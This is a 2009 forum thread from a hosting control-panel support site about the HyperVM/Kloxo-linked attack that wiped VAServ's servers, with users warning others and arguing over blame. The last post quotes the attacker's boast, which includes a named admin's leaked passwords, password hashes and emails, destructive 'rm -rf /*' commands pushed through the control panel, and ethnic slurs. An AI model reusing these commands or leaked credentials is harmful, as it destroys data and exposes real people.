LxCenter HyperVM & Kloxo Support

Forum



Members   Search      Help    Register    Login    Home
Home » Archive » Fixed Bugs, Security Issues and Implemented Features » DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM!
DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67293] Sun, 07 June 2009 19:36 Go to next message
rmwebs is currently offline rmwebs  United Kingdom
Messages: 86
Registered: September 2007
Location: UK, England
Valuable Member
Huge security issues -- DO NOT USE THEM. The LXLabs team knew about these issues for SEVENTEEN days and did NOTHING about them!

Because of this, VAServ (who hosts several thousand VPS accounts, and probably over 200,000 domains) has had their entire infrastructure wiped out!

I'll say this again:

DO NOT USE ANY LXLABS PRODUCTS!

If you have LXAdmin/Kloxo, disable it via root with this command:

service lxadmin stop

If you use HyperVM disable it on the master and ALL slaves with this command:

service hypervm stop

YOUR DATA WILL NOT BE LOST, THIS JUST TURNS OFF THE WEB INTERFACE!

You have been warned!

[Updated on: Sun, 07 June 2009 19:37]

Report message to a moderator

Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67329 is a reply to message #67293] Mon, 08 June 2009 01:23 Go to previous messageGo to next message
gary4gar is currently offline gary4gar  India
Messages: 11
Registered: May 2009
Member
Hopefully it would be fixed soon
This is real bummer!
icon9.gif  Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67336 is a reply to message #67293] Mon, 08 June 2009 02:02 Go to previous messageGo to next message
magic1000 is currently offline magic1000  Vietnam
Messages: 1
Registered: June 2009
Location: Vn
Member
Hello, I'm using Fsckvps.
Now my site is down!!! Embarassed Embarassed
Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67351 is a reply to message #67329] Mon, 08 June 2009 04:30 Go to previous messageGo to next message
rmwebs is currently offline rmwebs  United Kingdom
Messages: 86
Registered: September 2007
Location: UK, England
Valuable Member
gary4gar wrote on Mon, 08 June 2009 01:23
Hopefully it would be fixed soon
This is real bummer!


Even if it does get fixed, you'd be a fool to use it!

Seriously in the last few months, look what we've had:

1) LXLabs allowed someone to break into their support desk, and it took them approx 4 days to resolve the problem (even then all they did was change their password)

2) About a month ago there was a security hole found in HyperVM & LXAdmin

3) 19 days ago, these problems were reported to LXLabs and 'LXAdmin' just said 'we'll look at it' and didnt even open the URL posted to them showing the actual flaws. Even up until yesterday, they had done nothing to resolve anything.

4) 2 Days ago they issued an announcement saying there were security holes, and you should upgrade. We all upgraded, the security holes are still there.

5) They LIE. Take a look at their security page, its complete crap: http://lxlabs.com/software/kloxo/security/


So, if you wish to carry on using it, go ahead....but dont even bother posting here when this happens again (lets face it, it will....they still haven't fixed the security problems reported to them 19 days ago). They even admit that LXLabs products are not safe for use in a live environment!

[Updated on: Mon, 08 June 2009 04:30]

Report message to a moderator

Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67370 is a reply to message #67293] Mon, 08 June 2009 10:31 Go to previous messageGo to next message
Ales is currently offline Ales  Slovenia
Messages: 139
Registered: July 2008
Valuable Member
Just a reminder - running /script/upcp also restarts HyperVM. Same probably goes for Kloxo, we don't use it so I don't know.

So if you have shut down your control panels, after checking for updates, you need to stop the control panel again.
Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67381 is a reply to message #67351] Mon, 08 June 2009 13:06 Go to previous messageGo to next message
DeadBeet is currently offline DeadBeet  United States
Messages: 129
Registered: August 2008
Valuable Member
What do you suggest for use besides HyperVM? Do you know any other control panel? I am open to anything and after this I am extremely wary of enabling HyperVM.
Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67384 is a reply to message #67293] Mon, 08 June 2009 13:35 Go to previous messageGo to next message
rmwebs is currently offline rmwebs  United Kingdom
Messages: 86
Registered: September 2007
Location: UK, England
Valuable Member
We're making our own.

You could try vtonf. Couldn't get it working on Cent OS 5.3 however.
Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67404 is a reply to message #67293] Mon, 08 June 2009 16:06 Go to previous messageGo to next message
OdenGod is currently offline OdenGod  United States
Messages: 3
Registered: June 2009
Member
I am one of the victims from this event that has caused VAServ to go offline. I have been disgusted by Lxlabs for a while now and we were about to leave them when this attack occurred. Just great. Good job Lxlabs, I am proud of you guys.

Regards,
OdenGod
Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67678 is a reply to message #67293] Tue, 09 June 2009 14:59 Go to previous messageGo to next message
crises is currently offline crises  Spain
Messages: 31
Registered: March 2008
Member
Edit

[Updated on: Tue, 09 June 2009 15:04]

Report message to a moderator

Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67715 is a reply to message #67293] Tue, 09 June 2009 19:42 Go to previous messageGo to next message
burstnetworks is currently offline burstnetworks  Australia
Messages: 10
Registered: May 2009
Location: Brisbane
Member
Not everyone was effected by the attack. Also the update did fix some issues. Geeze he made this thing from scratch and all you do is bag it, i would love to see you make software like he has.

[Updated on: Tue, 09 June 2009 19:43]

Report message to a moderator

Re: DO NOT USE KLOXO/LXADMIN/HIAB/HYPERVM! [message #67851 is a reply to message #67404] Wed, 10 June 2009 21:54 Go to previous message
bliss is currently offline bliss  United Kingdom
Messages: 288
Registered: July 2008
Senior Member
OdenGod wrote on Mon, 08 June 2009 16:06
I am one of the victims from this event that has caused VAServ to go offline. I have been disgusted by Lxlabs for a while now and we were about to leave them when this attack occurred. Just great. Good job Lxlabs, I am proud of you guys.

Regards,
OdenGod




Perhaps you better read this then (who's fault was it??????)

This was released by anonymous person on multiple sites over the past few days. Maybe HyperVM was not at fault in all!


Quote:
Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are
Code:

e2×2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg
Code:

[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'

* Attempting to login using admin / ****off
* Logged in, showtime!

Output for 67.222.156.106
Output for xen3ws.vaserv.com
Output for vz22uk.vaserv.com
Output for xen4ws.vaserv.com
Output for vzspecial5.vaserv.com
Output for xen16.vaserv.com
Output for vz77uk.vaserv.com
Output for 91.186.26.128
Output for xen25.vaserv.com
Output for vz76uk.vaserv.com
Output for vz18tx.vaserv.com
Output for vz75uk.vaserv.com
Output for vz45uk.vaserv.com
Output for vzpent16.vaserv.com
Output for xen1tx.vaserv.com
Output for vz13tx.vaserv.com
Output for vz74uk.vaserv.com
Output for vzspecial8.vaserv.com
Output for xen24.vaserv.com
Output for vz73uk.vaserv.com
Output for rdns1.vaserv.com
Output for vz2tx.vaserv.com
Output for vz17tx.vaserv.com
Output for xen23.vaserv.com
Output for vz72uk.vaserv.com
Output for xen22.vaserv.com
Output for vzruffbuff.vaserv.com
Output for vzmario.vaserv.com
Output for xen21.vaserv.com
Output for vz71uk.vaserv.com
Output for vzspecial7.vaserv.com
Output for vz70uk.vaserv.com
Output for xen20.vaserv.com
Output for vz69uk.vaserv.com
Output for vzspecial6.vaserv.com
Output for vz7uk.vaserv.com
Output for vzspecial4.vaserv.com
Output for vzspecial3.vaserv.com
Output for xen19.vaserv.com
Output for vzspecial2.vaserv.com
Output for vzspecial1.vaserv.com
Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#

Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT!
BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha.
Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl
Code:

1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 ,
Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 ,
Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia - server22 space 1slot 1gb 0 ,

See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol
Code:

Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
SELECT *
FROM `tblclients`
LIMIT 0 , 30

Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.

Yea yea "his IP is:64.79.210.78″ here i saved u the trouble lolol
Code:

-bash-3.2# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)

venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)

venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255
UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1

-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#

I love to rm lol bye

~Thedefaced.org


Its just a shame that such a talented guy is no longer here.


R.I.P Ligesh!

[Updated on: Wed, 10 June 2009 21:56]

Report message to a moderator

Previous Topic:horde security issue
Next Topic:Multiple Security Issues in hyperVM/Kloxo
Goto Forum:
  


Current Time: Wed Jun 19 07:12:43 EDT 2013

Total time taken to generate the page: 0.02053 seconds
.:: Contact :: Home :: Privacy ::.

Click here to lend your support to: LxCenter and make a donation at www.pledgie.com !

Powered by: FUDforum 3.0.2.
Copyright ©2001-2010 FUDforum Bulletin Board Software